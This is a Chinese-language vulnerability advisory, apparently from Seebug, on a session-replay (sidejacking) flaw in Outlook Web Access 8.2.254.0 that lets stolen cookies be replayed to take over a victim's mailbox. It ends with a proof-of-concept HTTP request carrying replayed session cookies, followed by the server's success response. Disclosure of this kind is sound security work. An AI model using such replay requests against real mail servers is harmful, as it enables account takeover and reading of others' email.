Microsoft Outlook Web Access会话重放安全限制绕过漏洞

2011-10-28T00:00:00
ID SSV:23151
Type seebug
Reporter Root
Modified 2011-10-28T00:00:00

Description

BUGTRAQ ID: 50361

Outlook Web Access可使用户访问在会话环境中查看通信,而不仅仅是分散的邮件,从而帮助他们处理每天收到的大量邮件。

Microsoft Outlook Web Access在实现上存在安全限制绕过漏洞,远程攻击者可利用此漏洞劫持Web会话或通过重放攻击绕过身份验证,并获取受害者的电子邮件帐户。

SideJacking是窃取Web cookie,然后重放以克隆另一用户的Web会话的过程,使用克隆的Web会话,攻击者可利用受害者之前建立的站点访问。这可使读取网络报文的攻击者窃取所有提交给服务器的数据或客户端查看的网页。

Microsoft Outlook Web Access 8.2.254.0 厂商补丁:

Microsoft

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.microsoft.com/technet/security/

                                        
                                            
                                                GET /owa/?ae=Folder&t=IPF.Note&a= HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application,
application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, application/x-mfe-ipt,
*/*
Referer: https://www.example.com/owa/
Accept-Language: en-in
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0;
SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR
3.5.30729; FDM; .NET CLR 3.0.30729; .NET4.0C)
Accept-Encoding: gzip, deflate
Host: xxxwebmail.xxx.xxx
Connection: Keep-Alive
Cookie: sessionid=49307edc-0f26-4dae-95f8-02d3dc6ad8a3:000;
cadata="25HxHgvnciGT/BOV1+yiA+HThFiE6kBtFXSjqAF0B5vvPAIKu7PA8tzKUCnW9N4Ao9E1WSzUeA27dLBgx";
UserContext=e8997d6036554ada88a62dc9f2cf65d3

Response:

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 58676
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-OWA-Version: 8.2.254.0
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Tue, 25 Oct 2011 15:00:01 GMT